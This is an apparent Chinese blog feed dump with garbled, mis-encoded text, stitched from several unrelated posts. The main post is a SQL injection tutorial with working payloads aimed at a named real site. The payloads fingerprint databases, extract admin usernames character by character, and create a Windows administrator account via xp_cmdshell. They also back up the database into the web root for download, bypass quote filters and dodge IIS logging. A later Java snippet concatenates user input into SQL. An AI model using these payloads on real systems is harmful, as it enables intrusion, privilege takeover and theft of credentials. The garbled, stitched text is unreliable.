欏轟究璇村嚑鍙ワ紝浼楁墍鍛ㄧ煡錛孲QLServer鐨勭敤鎴穝a鏄釜絳夊悓Adminstrators鏉冮檺鐨勮鑹詫紝鎷垮埌浜?jiǎn)sa鏉冮檺錛屽嚑涔庤偗瀹氬彲浠ユ嬁鍒頒富鏈虹殑Administrator浜?jiǎn)銆備笂闈㈢殑鏂規(guī)硶鍙互寰堟柟渚跨殑嫻嬭瘯鍑烘槸鍚︽槸鐢╯a鐧誨綍錛岃娉ㄦ剰鐨勬槸錛氬鏋滄槸sa鐧誨綍錛屾彁紺烘槸灝嗏漝bo鈥濊漿鎹㈡垚int鐨勫垪鍙戠敓閿欒錛岃屼笉鏄漵a鈥濄?

濡傛灉鏈嶅姟鍣↖IS涓嶅厑璁歌繑鍥為敊璇彁紺猴紝閭f庝箞鍒ゆ柇鏁版嵁搴撶被鍨嬪憿錛熸垜浠彲浠ヤ粠Access鍜孲QLServer鍜屽尯鍒叆鎵嬶紝Access鍜孲QLServer閮芥湁鑷繁鐨勭郴緇熻〃錛屾瘮濡傚瓨鏀炬暟鎹簱涓墍鏈夊璞$殑琛紝Access鏄湪緋葷粺琛╗msysobjects]涓紝浣嗗湪Web鐜涓嬭璇ヨ〃浼?xì)鎻惤C衡滄病鏈夋潈闄愨濓紝SQLServer鏄湪琛╗sysobjects]涓紝鍦╓eb鐜涓?

鍙甯歌鍙栥?

鍦ㄧ‘璁ゅ彲浠ユ敞鍏ョ殑鎯呭喌涓嬶紝浣跨敤涓嬮潰鐨勮鍙ワ細(xì)

http://www.19cn.com/showdetail.asp?id=49;;and(select count(*) from sysobjects)>0

http://www.19cn.com/showdetail.asp?id=49;;and(select count(*) from msysobjects)>0

濡傛灉鏁版嵁搴撴槸SQLServer錛岄偅涔堢涓涓綉鍧鐨勯〉闈笌鍘熼〉闈?A target=_blank>http://www.19cn.com/showdetail.asp?id=49鏄ぇ鑷寸浉鍚岀殑錛涜岀浜屼釜緗戝潃錛岀敱浜庢壘涓嶅埌琛╩sysobjects錛屼細(xì)鎻愮ず鍑洪敊錛屽氨綆楃▼搴忔湁瀹歸敊澶勭悊錛岄〉闈篃涓庡師欏甸潰瀹屽叏涓嶅悓銆?

濡傛灉鏁版嵁搴撶敤鐨勬槸Access錛岄偅涔堟儏鍐靛氨鏈夋墍涓嶅悓錛岀涓涓綉鍧鐨勯〉闈笌鍘熼〉闈㈠畬鍏ㄤ笉鍚岋紱絎簩涓綉鍧錛屽垯瑙嗕箮鏁版嵁搴撹緗槸鍚﹀厑璁歌璇ョ郴緇熻〃錛屼竴鑸潵璇存槸涓嶅厑璁哥殑錛屾墍浠ヤ笌鍘熺綉鍧涔熸槸瀹屽叏涓嶅悓銆傚ぇ澶氭暟鎯呭喌涓嬶紝鐢ㄧ涓涓綉鍧灝卞彲浠ュ緱鐭ョ郴緇熸墍鐢ㄧ殑鏁版嵁搴撶被鍨嬶紝絎簩涓綉鍧鍙綔涓哄紑鍚疘IS閿欒鎻愮ず鏃剁殑楠岃瘉銆?

榪?闃?綃?

鍦ㄥ叆闂ㄧ瘒錛屾垜浠浼?xì)浜?jiǎn)錛籌急錛敞鍏ョ殑鍒ゆ柇鏂規(guī)硶錛屼絾鐪熸瑕佹嬁鍒扮綉绔欑殑淇濆瘑鍐呭錛屾槸榪滆繙涓嶅鐨勩傛帴涓嬫潵錛屾垜浠氨緇х畫(huà)瀛︿範(fàn)濡備綍浠庢暟鎹簱涓幏鍙栨兂瑕佽幏寰楃殑鍐呭錛岄鍏堬紝鎴戜滑鍏堢湅鐪嬶汲錛憋棘娉ㄥ叆鐨勪竴鑸楠わ細(xì)

絎竴鑺傘侊汲錛憋棘娉ㄥ叆鐨勪竴鑸楠?

棣栧厛錛屽垽鏂幆澧冿紝瀵繪壘娉ㄥ叆鐐癸紝鍒ゆ柇鏁版嵁搴撶被鍨嬶紝榪欏湪鍏ラ棬綃囧凡緇忚榪囦簡(jiǎn)銆?

鍏舵錛屾牴鎹敞鍏ュ弬鏁扮被鍨嬶紝鍦ㄨ剳嫻蜂腑閲嶆瀯SQL璇彞鐨勫師璨岋紝鎸夊弬鏁扮被鍨嬩富瑕佸垎涓轟笅闈笁縐嶏細(xì)

(A) ID=49 榪欑被娉ㄥ叆鐨勫弬鏁版槸鏁板瓧鍨嬶紝SQL璇彞鍘熻矊澶ц嚧濡備笅錛?
Select * from 琛ㄥ悕 where 瀛楁=49
娉ㄥ叆鐨勫弬鏁頒負(fù)ID=49 And [鏌ヨ鏉′歡]錛屽嵆鏄敓鎴愯鍙ワ細(xì)
Select * from 琛ㄥ悕 where 瀛楁=49 And [鏌ヨ鏉′歡]

(B) Class=榪炵畫(huà)鍓?榪欑被娉ㄥ叆鐨勫弬鏁版槸瀛楃鍨嬶紝SQL璇彞鍘熻矊澶ц嚧姒傚涓嬶細(xì)
Select * from 琛ㄥ悕 where 瀛楁=鈥欒繛緇墽鈥?
娉ㄥ叆鐨勫弬鏁頒負(fù)Class=榪炵畫(huà)鍓р?and [鏌ヨ鏉′歡] and 鈥樷?鈥?錛屽嵆鏄敓鎴愯鍙ワ細(xì)
Select * from 琛ㄥ悕 where 瀛楁=鈥欒繛緇墽鈥?and [鏌ヨ鏉′歡] and 鈥樷?鈥欌?

(C) 鎼滅儲(chǔ)鏃舵病榪囨護(hù)鍙傛暟鐨勶紝濡俴eyword=鍏抽敭瀛楋紝SQL璇彞鍘熻矊澶ц嚧濡備笅錛?
Select * from 琛ㄥ悕 where 瀛楁like 鈥?鍏抽敭瀛?鈥?
娉ㄥ叆鐨勫弬鏁頒負(fù)keyword=鈥?and [鏌ヨ鏉′歡] and 鈥?鈥?鈥欙紝 鍗蟲(chóng)槸鐢熸垚璇彞錛?
Select * from 琛ㄥ悕 where瀛楁like 鈥?鈥?and [鏌ヨ鏉′歡] and 鈥?鈥?鈥?鈥?

鎺ョ潃錛屽皢鏌ヨ鏉′歡鏇挎崲鎴怱QL璇彞錛岀寽瑙h〃鍚嶏紝渚嬪錛?

ID=49 And (Select Count(*) from Admin)>=0

濡傛灉欏甸潰灝變笌ID=49鐨勭浉鍚岋紝璇存槑闄勫姞鏉′歡鎴愮珛錛屽嵆琛ˋdmin瀛樺湪錛屽弽涔嬶紝鍗充笉瀛樺湪錛堣鐗㈣榪欑鏂規(guī)硶錛夈?

濡傛寰幆錛岀洿鑷崇寽鍒拌〃鍚嶄負(fù)姝€?

琛ㄥ悕鐚滃嚭鏉ュ悗錛屽皢Count(*)鏇挎崲鎴怌ount(瀛楁鍚?錛岀敤鍚屾牱鐨勫師鐞嗙寽瑙e瓧孌靛悕銆?

鏈変漢浼?xì)璇村Q氳繖閲屾湁涓浜涘伓鐒剁殑鎴愬垎錛屽鏋滆〃鍚嶈搗寰楀緢澶嶆潅娌¤寰嬬殑錛岄偅鏍規(guī)湰灝辨病寰楃帺涓嬪幓浜?jiǎn)銆傝寰楀緢瀵癸紝榪欎笘鐣屾牴鏈氨涓嶅瓨鍦?00%鎴愬姛鐨勯粦瀹㈡妧鏈紝鑻嶈潎涓嶅彯鏃犵紳鐨勮泲錛屾棤璁哄鎶鏈楂樻繁鐨勯粦瀹紝閮芥槸鍥犱負(fù)鍒漢鐨勭▼搴忓啓寰椾笉涓ュ瘑鎴栦嬌鐢ㄨ呬繚瀵嗘剰璇嗕笉澶燂紝鎵嶆湁寰椾笅鎵嬨?

鏈夌偣璺戦?shù)簡(jiǎn)锛岃瘽璇村洖鏉ュQ屽浜嶴QLServer鐨勫簱錛岃繕鏄湁鍔炴硶璁╃▼搴忓憡璇夋垜浠〃鍚嶅強(qiáng)瀛楁鍚嶇殑錛屾垜浠湪楂樼駭綃囦腑浼?xì)鍋氫粙缁嶃?

鏈鍚庯紝鍦ㄨ〃鍚嶅拰鍒楀悕鐚滆В鎴愬姛鍚庯紝鍐嶄嬌鐢⊿QL璇彞錛屽緱鍑哄瓧孌電殑鍊鹼紝涓嬮潰浠嬬粛涓縐嶆渶甯哥敤鐨勬柟娉曪紞Ascii閫愬瓧瑙g爜娉曪紝铏界劧榪欑鏂規(guī)硶閫熷害寰堟參錛屼絾鑲畾鏄彲琛岀殑鏂規(guī)硶銆?

鎴戜滑涓句釜渚嬪瓙錛屽凡鐭ヨ〃Admin涓瓨鍦╱sername瀛楁錛岄鍏堬紝鎴戜滑鍙栫涓鏉¤褰曪紝嫻嬭瘯闀垮害錛?

http://www.19cn.com/showdetail.asp?id=49;;and (select top 1 len(username) from Admin)>0

鍏堣鏄庡師鐞嗭細(xì)濡傛灉top 1鐨剈sername闀垮害澶т簬0錛屽垯鏉′歡鎴愮珛錛涙帴鐫灝辨槸>1銆?gt;2銆?gt;3榪欐牱嫻嬭瘯涓嬪幓錛屼竴鐩村埌鏉′歡涓嶆垚绔嬩負(fù)姝紝姣斿>7鎴愮珛錛?gt;8涓嶆垚绔嬶紝灝辨槸len(username)=8

銆銆褰撶劧娌′漢浼?xì)绗ㄥ緱浠?,1,2,3涓涓釜嫻嬭瘯錛屾庝箞鏍鋒墠姣旇緝蹇氨鐪嬪悇鑷彂鎸ヤ簡(jiǎn)銆傚湪寰楀埌username鐨勯暱搴﹀悗錛岀敤mid(username,N,1)鎴彇絎琋浣嶅瓧絎︼紝鍐峚sc(mid(username,N,1))寰楀埌ASCII鐮侊紝姣斿錛?

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

鍚屾牱涔熸槸鐢ㄩ愭緙╁皬鑼冨洿鐨勬柟娉曞緱鍒扮1浣嶅瓧絎︾殑ASCII鐮侊紝娉ㄦ剰鐨勬槸鑻辨枃鍜屾暟瀛楃殑ASCII鐮佸湪1-128涔嬮棿錛屽彲浠ョ敤鎶樺崐娉曞姞閫熺寽瑙o紝濡傛灉鍐欐垚紼嬪簭嫻嬭瘯錛屾晥鐜囦細(xì)鏈夋瀬澶х殑鎻愰珮銆?

絎簩鑺傘侊汲錛憋棘娉ㄥ叆甯哥敤鍑芥暟

鏈塖QL璇█鍩虹鐨勪漢錛屽湪錛籌急錛敞鍏ョ殑鏃跺欐垚鍔熺巼姣斾笉鐔熸?zhèn)夌殑錆h楂樺緢澶氥傛垜浠湁蹇呰鎻愰珮?shù)竴涓嬭嚜宸辯殑SQL姘村鉤錛岀壒鍒槸涓浜涘父鐢ㄧ殑鍑芥暟鍙?qiáng)鍛戒护銆?

Access錛歛sc(瀛楃) SQLServer錛歶nicode(瀛楃)

浣滅敤錛氳繑鍥炴煇瀛楃鐨凙SCII鐮?

Access錛歝hr(鏁板瓧) SQLServer錛歯char(鏁板瓧)

浣滅敤錛氫笌asc鐩稿弽錛屾牴鎹瓵SCII鐮佽繑鍥炲瓧絎?

Access錛歮id(瀛楃涓?N,L) SQLServer錛歴ubstring(瀛楃涓?N,L)

浣滅敤錛氳繑鍥炲瓧絎︿覆浠嶯涓瓧絎﹁搗闀垮害涓篖鐨勫瓙瀛楃涓詫紝鍗砃鍒癗 L涔嬮棿鐨勫瓧絎︿覆

Access錛歛bc(鏁板瓧) SQLServer錛歛bc (鏁板瓧)

浣滅敤錛氳繑鍥炴暟瀛楃殑緇濆鍊鹼紙鍦ㄧ寽瑙f眽瀛楃殑鏃跺欎細(xì)鐢ㄥ埌錛?

Access錛欰 between B And C SQLServer錛欰 between B And C

浣滅敤錛氬垽鏂瑼鏄惁鐣屼簬B涓嶤涔嬮棿

絎笁鑺傘佷腑鏂囧鐞嗘柟娉?

鍦ㄦ敞鍏ヤ腑紕板埌涓枃瀛楃鏄父鏈夌殑浜嬶紝鏈変簺浜轟竴紕板埌涓枃瀛楃灝辨兂鎵撻鍫傞紦浜?jiǎn)銆傚叾瀹炲彧瑕佸涓枃鐨勭紪鐮佹湁鎵浜?jiǎn)瑙eQ屸滀腑鏂囨亹鎯х棁鈥濆緢蹇彲浠ュ厠鏈嶃?

鍏堣涓鐐瑰父璇嗭細(xì)

Access涓紝涓枃鐨凙SCII鐮佸彲鑳戒細(xì)鍑虹幇璐熸暟錛屽彇鍑?guó)櫙ヨ礋鏁板悗鐢╝bs()鍙栫粷瀵瑰鹼紝姹夊瓧瀛楃涓嶅彉銆?

SQLServer涓紝涓枃鐨凙SCII涓烘鏁幫紝浣嗙敱浜庢槸UNICODE鐨勫弻浣嶇紪鐮侊紝涓嶈兘鐢ㄥ嚱鏁癮scii()鍙栧緱ASCII鐮侊紝蹇呴』鐢ㄥ嚱鏁皍nicode ()榪斿洖unicode鍊鹼紝鍐嶇敤nchar鍑芥暟鍙栧緱瀵瑰簲鐨勪腑鏂囧瓧絎︺?


浜?jiǎn)瑙d簡(jiǎn)涓婇潰鐨勪袱鐐瑰悗锛屾槸涓嶆槸瑙夊緱涓枃鐚滆В鍏跺疄涔熻窡鑻辨枃宸笉澶氬憿锛熼櫎浜?jiǎn)浣跨敤鐨勫嚱鏁拌娉ㄦ剰銆佺寽瑙h寖鍥村ぇ涓鐐瑰錛屾柟娉曟槸娌′粈涔堜袱鏍風(fēng)殑銆?

楂?綰?綃?

鐪嬪畬鍏ラ棬綃囧拰榪涢樁綃囧悗錛岀◢鍔犵粌涔?fàn)锛岀牬瑙d竴鑸殑緗戠珯鏄病闂?shù)簡(jiǎn)銆備絾濡傛灉紕板埌琛ㄥ悕鍒楀悕鐚滀笉鍒幫紝鎴栫▼搴忎綔鑰呰繃婊や簡(jiǎn)涓浜涚壒孌婂瓧絎︼紝鎬庝箞鎻愰珮娉ㄥ叆鐨勬垚鍔熺巼錛熸庝箞鏍鋒彁楂樼寽瑙f晥鐜囷紵璇峰ぇ瀹舵帴鐫寰(xiàn)涓嬬湅楂樼駭綃囥?

絎竴鑺傘佸埄鐢ㄧ郴緇熻〃娉ㄥ叆SQLServer鏁版嵁搴?

SQLServer鏄竴涓姛鑳藉己澶х殑鏁版嵁搴撶郴緇燂紝涓庢搷浣滅郴緇熶篃鏈夌揣瀵嗙殑鑱旂郴錛岃繖緇欏紑鍙戣呭甫鏉ヤ簡(jiǎn)寰堝ぇ鐨勬柟渚匡紝浣嗗彟涓鏂歸潰錛屼篃涓烘敞鍏ヨ呮彁渚涗簡(jiǎn)涓涓煩鏉匡紝鎴戜滑鍏堟潵鐪嬬湅鍑犱釜鍏蜂綋鐨勪緥瀛愶細(xì)

鈶?http://Site/url.asp?id=1;exec master..xp_cmdshell 鈥渘et user name password /add鈥?-

銆銆鍒嗗彿;鍦⊿QLServer涓〃紺洪殧寮鍓嶅悗涓ゅ彞璇彞錛?-琛ㄧず鍚庨潰鐨勮鍙ヤ負(fù)娉ㄩ噴錛屾墍浠ワ紝榪欏彞璇彞鍦⊿QLServer涓皢琚垎鎴愪袱鍙ユ墽琛岋紝鍏堟槸Select鍑篒D=1鐨勮褰曪紝鐒跺悗鎵ц瀛樺偍榪囩▼xp_cmdshell錛岃繖涓瓨鍌ㄨ繃紼嬬敤浜庤皟鐢ㄧ郴緇熷懡浠わ紝浜庢槸錛岀敤net鍛戒護(hù)鏂板緩浜?jiǎn)鐢ㄦ埛鍚嶄负name銆佸瘑鐮佷負(fù)password鐨剋indows鐨勫笎鍙鳳紝鎺ョ潃錛?

鈶?http://Site/url.asp?id=1;exec master..xp_cmdshell 鈥渘et localgroup name administrators/add鈥?-

銆銆灝嗘柊寤虹殑甯愬彿name鍔犲叆綆$悊鍛樼粍錛屼笉鐢ㄤ袱鍒嗛挓錛屼綘宸茬粡鎷垮埌浜?jiǎn)绯痪l熸渶楂樻潈闄愶紒褰撶劧錛岃繖縐嶆柟娉曞彧閫傜敤浜庣敤sa榪炴帴鏁版嵁搴撶殑鎯呭喌錛屽惁鍒欙紝鏄病鏈夋潈闄愯皟鐢▁p_cmdshell鐨勩?

銆銆鈶?http://Site/url.asp?id=1 ;;and db_name()>0

鍓嶉潰鏈変釜綾諱技鐨勪緥瀛恆nd user>0錛屼綔鐢ㄦ槸鑾峰彇榪炴帴鐢ㄦ埛鍚嶏紝db_name()鏄彟涓涓郴緇熷彉閲忥紝榪斿洖鐨勬槸榪炴帴鐨勬暟鎹簱鍚嶃?

鈶?http://Site/url.asp?id=1;backup database 鏁版嵁搴撳悕 to disk=鈥檆:\inetpub\wwwroot\1.db鈥?--榪欐槸鐩稿綋鐙犵殑涓鎷涳紝浠庘憿鎷垮埌鐨勬暟鎹簱鍚嶏紝鍔犱笂鏌愪簺IIS鍑洪敊鏆撮湶鍑虹殑緇濆璺緞錛屽皢鏁版嵁搴撳浠藉埌Web鐩綍涓嬮潰錛屽啀鐢℉TTP鎶婃暣涓暟鎹簱灝卞畬瀹屾暣鏁寸殑涓嬭澆鍥炴潵錛屾墍鏈夌殑綆$悊鍛樺強(qiáng)鐢ㄦ埛瀵嗙爜閮戒竴瑙堟棤閬楋紒鍦ㄤ笉鐭ラ亾緇濆璺緞鐨勬椂鍊欙紝榪樺彲浠ュ浠藉埌緗戠粶鍦板潃鐨勬柟娉曪紙濡?A href="http://file:///202.96.xx.xxShare1.db" target=_blank>\\202.96.xx.xx\Share\1.db錛夛紝浣嗘垚鍔熺巼涓嶉珮銆?

銆銆鈶?http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=鈥橴鈥檃nd status>0)>0

鍓嶉潰璇磋繃錛宻ysobjects鏄疭QLServer鐨勭郴緇熻〃錛屽瓨鍌ㄧ潃鎵鏈夌殑琛ㄥ悕銆佽鍥俱佺害鏉熷強(qiáng)鍏跺畠瀵硅薄錛寈type=鈥橴鈥檃nd status>0錛岃〃紺虹敤鎴峰緩绔嬬殑琛ㄥ悕錛屼笂闈㈢殑璇彞灝嗙涓涓〃鍚嶅彇鍑猴紝涓?姣旇緝澶у皬錛岃鎶ラ敊淇℃伅鎶婅〃鍚嶆毚闇插嚭鏉ャ傜浜屻佺涓変釜琛ㄥ悕鎬庝箞鑾峰彇錛熻繕鏄暀緇欐垜浠仾鏄庣殑璇昏呮濊冨惂銆?

鈶?http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(鈥樿〃鍚嶁?,1) from sysobjects)>0

浠庘懁鎷垮埌琛ㄥ悕鍚庯紝鐢╫bject_id(鈥樿〃鍚嶁?鑾峰彇琛ㄥ悕瀵瑰簲鐨勫唴閮↖D錛宑ol_name(琛ㄥ悕ID,1)浠h〃璇ヨ〃鐨勭1涓瓧孌靛悕錛屽皢1鎹㈡垚2,3,4...灝卞彲浠ラ愪釜鑾峰彇鎵鐚滆В琛ㄩ噷闈㈢殑瀛楁鍚嶃?

銆銆浠ヤ笂6鐐規(guī)槸鎴戠爺絀禨QLServer娉ㄥ叆鍗婂勾澶氫互鏉ョ殑蹇?jī)琛緇撴櫠錛屽彲浠ョ湅鍑猴紝瀵筍QLServer鐨勪簡(jiǎn)瑙g▼搴︼紝鐩存帴褰卞搷鐫鎴愬姛鐜囧強(qiáng)鐚滆В閫熷害銆傚湪鎴戠爺絀禨QLServer娉ㄥ叆涔嬪悗錛屾垜鍦ㄥ紑鍙戞柟闈㈢殑姘村鉤涔熷緱鍒板緢澶х殑鎻愰珮錛屽懙鍛碉紝涔熻瀹夊叏涓庡紑鍙戞湰鏉ュ氨鏄浉杈呯浉鎴愮殑鍚с?

絎簩鑺傘佺粫榪囩▼搴忛檺鍒剁戶(hù)緇敞鍏?

鍦ㄥ叆闂ㄧ瘒鎻愬埌錛屾湁寰堝浜哄枩嬈㈢敤鈥欏彿嫻嬭瘯娉ㄥ叆婕忔礊錛屾墍浠ヤ篃鏈夊緢澶氫漢鐢ㄨ繃婊も欏彿鐨勬柟娉曟潵鈥滈槻姝⑩濇敞鍏ユ紡媧烇紝榪欎篃璁歌兘鎸′綇涓浜涘叆闂ㄨ呯殑鏀誨嚮錛屼絾瀵癸汲錛憋棘娉ㄥ叆姣旇緝鐔熸?zhèn)夌殑錆h錛岃繕鏄彲浠ュ埄鐢ㄧ浉鍏崇殑鍑芥暟錛岃揪鍒扮粫榪囩▼搴忛檺鍒剁殑鐩殑銆?

鍦ㄢ滐汲錛憋棘娉ㄥ叆鐨勪竴鑸楠も濅竴鑺備腑錛屾垜鎵鐢ㄧ殑璇彞錛岄兘鏄粡榪囨垜浼樺寲錛岃鍏朵笉鍖呭惈鏈夊崟寮曞彿鐨勶紱鍦ㄢ滃埄鐢ㄧ郴緇熻〃娉ㄥ叆SQLServer鏁版嵁搴撯濅腑錛屾湁浜涜鍙ュ寘鍚湁鈥欏彿錛屾垜浠婦涓緥瀛愭潵鐪嬬湅鎬庝箞鏀歸犺繖浜涜鍙ワ細(xì)

綆鍗曠殑濡倃here xtype=鈥橴鈥欙紝瀛楃U瀵瑰簲鐨凙SCII鐮佹槸85錛屾墍浠ュ彲浠ョ敤where xtype=char(85)浠f浛錛涘鏋滃瓧絎︽槸涓枃鐨勶紝姣斿where name=鈥欑敤鎴封欙紝鍙互鐢╳here name=nchar(29992) nchar(25143)浠f浛銆?

絎笁鑺傘佺粡楠屽皬緇?

1.鏈変簺浜轟細(xì)榪囨護(hù)Select銆乁pdate銆丏elete榪欎簺鍏抽敭瀛楋紝浣嗗亸鍋忓繕璁板尯鍒嗗ぇ灝忓啓錛屾墍浠ュぇ瀹跺彲浠ョ敤selecT榪欐牱灝濊瘯涓涓嬨?

2.鍦ㄧ寽涓嶅埌瀛楁鍚嶆椂錛屼笉濡ㄧ湅鐪嬬綉绔欎笂鐨勭櫥褰曡〃鍗曪紝涓鑸負(fù)浜?jiǎn)鏂逛究钃v瑙侊紝瀛楁鍚嶉兘涓庤〃鍗曠殑杈撳叆妗嗗彇鐩稿悓鐨勫悕瀛椼?

3.鐗瑰埆娉ㄦ剰錛氬湴鍧鏍忕殑 鍙蜂紶鍏ョ▼搴忓悗瑙i噴涓虹┖鏍鹼紝+瑙i噴涓?鍙鳳紝%瑙i噴涓?鍙鳳紝鍏蜂綋鍙互鍙傝僓RLEncode鐨勭浉鍏充粙緇嶃?

4.鐢℅et鏂規(guī)硶娉ㄥ叆鏃訛紝IIS浼?xì)璁板綍浣犳墍鏈夌殑鎻愪氦瀛楃涓詫紝瀵筆ost鏂規(guī)硶鍋氬垯涓嶈褰曪紝鎵浠ヨ兘鐢≒ost鐨勭綉鍧灝介噺涓嶇敤Get銆?

5. 鐚滆ВAccess鏃跺彧鑳界敤Ascii閫愬瓧瑙g爜娉曪紝SQLServer涔熷彲浠ョ敤榪欑鏂規(guī)硶錛屽彧闇瑕佷袱鑰呬箣闂寸殑鍖哄埆鍗沖彲錛屼絾鏄鏋滆兘鐢⊿QLServer鐨勬姤閿欎俊鎭妸鍊兼毚闇插嚭鏉ワ紝閭f晥鐜囧拰鍑嗙‘鐜囦細(xì)鏈夋瀬澶х殑鎻愰珮銆?

闃?鑼?鏂?娉?

錛籌急錛敞鍏ユ紡媧炲彲璋撴槸鈥滃崈閲屼箣鍫わ紝婧冧簬铓佺┐鈥濓紝榪欑婕忔礊鍦ㄧ綉涓婃瀬涓烘櫘閬嶏紝閫氬父鏄敱浜庣▼搴忓憳瀵規(guī)敞鍏ヤ笉浜?jiǎn)瑙eQ屾垨鑰呯▼搴忚繃婊や笉涓ユ牸錛屾垨鑰呮煇涓弬鏁板繕璁版鏌ュ鑷淬傚湪榪欓噷錛屾垜緇欏ぇ瀹朵竴涓嚱鏁幫紝浠f浛ASP涓殑Request鍑芥暟錛屽彲浠ュ涓鍒囩殑SQL娉ㄥ叆Say NO錛屽嚱鏁板涓嬶細(xì)

function SafeRequest(ParaName,ParaType)
'--- 浼犲叆鍙傛暟 ---
'ParaName:鍙傛暟鍚嶇О-瀛楃鍨?
'ParaType:鍙傛暟綾誨瀷-鏁板瓧鍨?1琛ㄧず浠ヤ笂鍙傛暟鏄暟瀛楋紝0琛ㄧず浠ヤ笂鍙傛暟涓哄瓧絎?

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "鍙傛暟" & ParaName & "蹇呴』涓烘暟瀛楀瀷錛?
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function

鏂囩珷鍒拌繖閲屽氨緇撴潫浜?jiǎn)锛屼笉绠′綘鏄畨鍏ㄤ汉鍛樸佹妧鏈埍濂借呰繕鏄▼搴忓憳錛屾垜閮藉笇鏈涙湰鏂囪兘瀵逛綘鏈夋墍甯姪銆?BR>

my java 2006-02-05 09:58 鍙戣〃璇勮
]]>
UChttp://m.tkk7.com/lmsun/archive/2006/02/02/29464.htmlmy javamy javaThu, 02 Feb 2006 03:17:00 GMThttp://m.tkk7.com/lmsun/archive/2006/02/02/29464.htmlhttp://m.tkk7.com/lmsun/comments/29464.htmlhttp://m.tkk7.com/lmsun/archive/2006/02/02/29464.html#Feedback0http://m.tkk7.com/lmsun/comments/commentRss/29464.htmlhttp://m.tkk7.com/lmsun/services/trackbacks/29464.html
http://www.wsmmz.net

http://www.sooweb.net/Html/Soft/82.html

http://www.hnwuyun.com/jc/

http://club.cat898.com/newbbs/printpage.asp?BoardID=18&ID=760319

http://lsdw.go1.icpcn.com/pstg/6.htm

http://font.flash8.net/font/list.aspx?page=3&c_id=383&s_id=395

my java 2006-02-02 11:17 鍙戣〃璇勮
]]>
鐢?shù)鑴懢~栫▼鎶宸т笌緇存姢http://m.tkk7.com/lmsun/archive/2006/01/26/29231.htmlmy javamy javaThu, 26 Jan 2006 03:16:00 GMThttp://m.tkk7.com/lmsun/archive/2006/01/26/29231.htmlhttp://m.tkk7.com/lmsun/comments/29231.htmlhttp://m.tkk7.com/lmsun/archive/2006/01/26/29231.html#Feedback0http://m.tkk7.com/lmsun/comments/commentRss/29231.htmlhttp://m.tkk7.com/lmsun/services/trackbacks/29231.htmlhttp://www.comprg.com.cn



http://supercss.com/

my java 2006-01-26 11:16 鍙戣〃璇勮
]]>
閰嶇疆ssl in tomcathttp://m.tkk7.com/lmsun/archive/2005/11/02/17820.htmlmy javamy javaWed, 02 Nov 2005 07:21:00 GMThttp://m.tkk7.com/lmsun/archive/2005/11/02/17820.htmlhttp://m.tkk7.com/lmsun/comments/17820.htmlhttp://m.tkk7.com/lmsun/archive/2005/11/02/17820.html#Feedback0http://m.tkk7.com/lmsun/comments/commentRss/17820.htmlhttp://m.tkk7.com/lmsun/services/trackbacks/17820.html
keytool -genkey -alias tomcat -keyalg RSA

緙虹渷璇佷功鏂囦歡鍚嶄負(fù)錛?keystore

2銆佷慨鏀規(guī)枃浠秙erver.xml
  <Connector port="8443"
               maxThreads="150" minSpareThreads="25" maxSpareThreads="75"
               enableLookups="false" disableUploadTimeout="true"
               acceptCount="100" debug="0" scheme="https" secure="true"
               clientAuth="false"
      keystoreFile="C:\keystore\.keystore"
      keystorePass="netscape"
      sslProtocol="TLS" />

3銆亀eb.xml
<security-constraint>
    <web-resource-collection>
      <web-resource-name>Purchase</web-resource-name>
      <url-pattern>/ssl/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>registered-user</role-name>
    </auth-constraint>
    <user-data-constraint>
      <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
  </security-constraint>
 
  <!-- Only users in the administrator role can access
       the delete-account.jsp page within the admin
       directory. -->
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Account Deletion</web-resource-name>
      <url-pattern>/admin/delete-account.jsp</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>
 
  <!-- Tell the server to use form-based authentication. -->
  <login-config>
    <auth-method>FORM</auth-method>
    <form-login-config>
      <form-login-page>/admin/login.jsp</form-login-page>
      <form-error-page>/admin/login-error.jsp</form-error-page>
    </form-login-config>
  </login-config>
   
 
4銆侀噸鍚痶omcat




my java 2005-11-02 15:21 鍙戣〃璇勮
]]>
ListEmpActionhttp://m.tkk7.com/lmsun/archive/2005/09/27/14187.htmlmy javamy javaTue, 27 Sep 2005 05:21:00 GMThttp://m.tkk7.com/lmsun/archive/2005/09/27/14187.htmlhttp://m.tkk7.com/lmsun/comments/14187.htmlhttp://m.tkk7.com/lmsun/archive/2005/09/27/14187.html#Feedback0http://m.tkk7.com/lmsun/comments/commentRss/14187.htmlhttp://m.tkk7.com/lmsun/services/trackbacks/14187.html/*
 * Created on 2005-9-27
 *
 * TODO To change the template for this generated file go to
 * Window - Preferences - Java - Code Style - Code Templates
 */
package fibernews.action;
import javax.servlet.http.*;

import java.sql.*;
import java.util.*;
import fibernews.framework.db.*;
import fibernews.beans.Employee;
import fibernews.util.function.HandleString;
import fibernews.framework.logging.Logger;

/**
 * @author Administrator
 *
 * TODO To change the template for this generated type comment go to
 * Window - Preferences - Java - Code Style - Code Templates
 */
public class ListEmpAction extends Action {

 List list ;
 public String process(HttpServletRequest request, HttpServletResponse response) {
     Connection conn=DBHelper.getConnection();
 Statement st=null;
     PreparedStatement pst=null;
     ResultSet rs=null ;
        String  query=HandleString.toChinese(request.getParameter("query"));
        if ((query==null)||query.trim().equals("")) query="lmsun";
  try{
 
      String sql="select * from employee_email where name like '%"+query+"%' or email like '%"+query+"%'" ;
      //st=conn.createStatement();
  pst=conn.prepareStatement(sql);
  rs=pst.executeQuery();
  list=new ArrayList();
  Employee emp;
  while (rs.next()){
   emp=new Employee();
   emp.setId(rs.getString("id"));
   emp.setEmployee_bh(rs.getString("employee_bh"));
   emp.setName(rs.getString("name"));
   emp.setEmail(rs.getString("email"));
   emp.setDepartment1(rs.getString("department1"));
   emp.setDepartment2(rs.getString("department2"));
   emp.setDepartment3(rs.getString("department3"));
   list.add(emp);
  }

  
  }
  
   catch (Exception e) {
         System.out.println("Error Connecting to catalog DB: " + e.toString());
       }
   finally {
    DBHelper.close(rs,pst,conn);
   }
   request.setAttribute("empList",list);
   return "/intra/query/emailbook.jsp";
  
 }
   public static void main(String[] args)
   {
